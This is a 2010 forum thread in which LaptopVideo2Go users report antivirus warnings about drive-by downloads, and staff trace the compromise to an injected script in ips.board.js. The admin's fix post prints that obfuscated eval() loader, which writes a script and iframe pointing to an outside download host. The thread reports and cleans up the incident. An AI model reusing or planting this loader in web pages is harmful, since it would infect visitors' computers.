Laptopvideo2Go flagged by Norton as having threats

[bobwalt]

I just had Norton tell me that the LaptopVideo2Go site has 2 drive by download threats - MSIE CrimePack Toolkit JavaClass Variant and MSIE CrimePack Toolkit JavaClass Variant. This happened after I was asked to install a Java update while I was on this site. Norton blocked the them but I thought you should know. There is a link on the report for websites to contact them.

Bob

[coolguy16]

Yes, this site gets hung up in Firefox when loading (waiting for missing Java plugins to be installed). I already have my Java up-to date. Do not install any plugin.

Edited December 5, 2010 by coolguy16

[feigned-existence]

i got no problems reported by my anti-virus and its pretty damn good one! i even pay for it! ^_^ i personally use only this anti-virus i believe it has my back unlike some other ones i have tried i use NOD32 from ESET

[mrx]

I use FireFox with NoScript. It's the only way to be sure java can't mess with you.

[BP13]

I only noticed one thing. When I click on the forums button with firefox it hangs for a bit then a download dialog opens up asking me if I want to download a windows media playlist. The file name is something random like gfhjgfsdjfhfsjfhdakduhyadaudhadajdahj. I can't reproduce it at the moment as it's not happening anymore.

It also says "Additional plugins are needed to display this page. Then I click Install and it returns "No suitable plugins were found"

Edited December 5, 2010 by BP13

[feigned-existence]

I use FireFox with NoScript. It's the only way to be sure java can't mess with you.

i also use firefox but i use adblock plus instead maybe that helps aswell.

[mobilenvidia]

I'm using Chrome and no problems at all.

Just installed latest version of FF and no issues with the site there either (default settings)

IE8 also no issues.

I have a feeling Norton is reporting a false positive, this is quite common for AVG.

I've been using Vipre AV premium for the last 2 years this has been a very steady AV for me, even helped develop the Win7 version.

But we take all these threats seriously will check the server that nothing has gotten through

[LSudlow]

Avast was reporting a hit here most of last week but I just ignored it. I always scanned afterward and never found an infection. No hits reported here yesterday or today.

[bobwalt]

I'm using Chrome and no problems at all.

Just installed latest version of FF and no issues with the site there either (default settings)

IE8 also no issues.

I have a feeling Norton is reporting a false positive, this is quite common for AVG.

I've been using Vipre AV premium for the last 2 years this has been a very steady AV for me, even helped develop the Win7 version.

But we take all these threats seriously will check the server that nothing has gotten through

Someone needs to contact Symatec as this site is now blocked by Norton Internet Security. In addition when I access the site anyway Norton shows my PC as being attacked by two items. Anyone who uses Norton will see your site as flagged as a known malware site when it comes up on a Google search.

Bob

[BP13]

Virus find:

Direct Image: http://i56.tinypic.com/8xifqu.png

---

[Michael Marley]

I have also gotten the Java thing and the .asx file a couple of times. I think something is up.

[mobilenvidia]

I'm quite perplexed about this, I can't see anything that is causing this.

I can only assume that either Adsense or Konterra ads are causing this.

Or possibly a FF plugin (I'm running default FF)

[Michael Marley]

I am using Adblock+, so it is unlikely that the ads are causing it for me.

[Teraphy]

Wow, thanks everyone! I have everything turned off for this site in case things like this happen but I didn't get anything. I may have found something but we'll see if this still continues. I also forced a clean reset of skins and cached items. We'll take some extra measures as we definitely do not like this at all!

[mobilenvidia]

I am using Adblock+, so it is unlikely that the ads are causing it for me.

Adblock+ is also used by BP13, this could be a common link ?

I'll grab this and have a study

What subscriptions are you guys using for Adblock+ ?

[BP13]

Adblock+ is also used by BP13, this could be a common link ?

I'll grab this and have a study

What subscriptions are you guys using for Adblock+ ?

EasyList(USA)

But remember this thing only popped up for me 3 times before. Seems that it does this at random times and not very often.

Edited December 8, 2010 by BP13

[Michael Marley]

I also have EasyList.

[feigned-existence]

i use fanboys list and easy list

[Teraphy]

I received the issue. Quite interesting. Tracking it down now.

I squashed it. It was found in ips.board.js which had the following code to include a script with src in the header and an iframe linking back to sites for downloading purposes.

eval(function(m,c,h){function z(i){return(i< 62?'':z(parseInt(i/62)))+((i=i%62)>35?String.fromCharCode(i+29):i.toString(36))}for(var i=0;i< m.length;i++)h[z(i)]=m[i];function d(w){return h[w]?h[w]:w;};return c.replace(/\b\w+\b/g,d);}('var||lde|s91515|y460y4115y499y4114y4105y4112y4116y432y4115y4114y499y461y4104y4116y4116y4112y458y447y447y499y4108|y4105y499y4107y4113y446y4110y4101y4116y447y497y446y4106y4115y462y460y447y4115y499y4114y4105y4112|y4116y462|yeed9c|split|y4|for|sf7|length|String|fromCharCode|document|write'.split('|'),'0 2="";0 3="4"+"5"+"6";0 7=3.8("9");a(0 b=1;b<7.c;b++){2+=d.e(7[b])}f.g(2);',{}));

[mobilenvidia]

Glad that is sorted, I'll sleep better tonight.

Wonder why it never showed for me, I feel left out now :)

[bobwalt]

Glad that is sorted, I'll sleep better tonight.

Wonder why it never showed for me, I feel left out now :)

Great!

Someone now has to tell Norton so it takes the site off their know bad site list.

Bob

[LSudlow]

The one I was getting is back. See the attached PNG...

[Infinity7]

The one I was getting is back. See the attached PNG...

Oh, I wondered why when I first come to this site there is an all-black Windows Media Player window that opens and closes really fast at the bottom of my screen.

[H4ck 3D]

Popular websites are always under threat from hackers :) Can't we all just get along? :):P

Infinity7 was that something that happened recently?

[mobilenvidia]

Oh, I wondered why when I first come to this site there is an all-black Windows Media Player window that opens and closes really fast at the bottom of my screen.

At the very bottom of the forum screens is a NVIDIA gaming ad, this is probably what you are seeing and blocking ?

We should be bug free at this point in time, even the URL123.info is fixed.

And yes, more popular more bugs trying to get in :)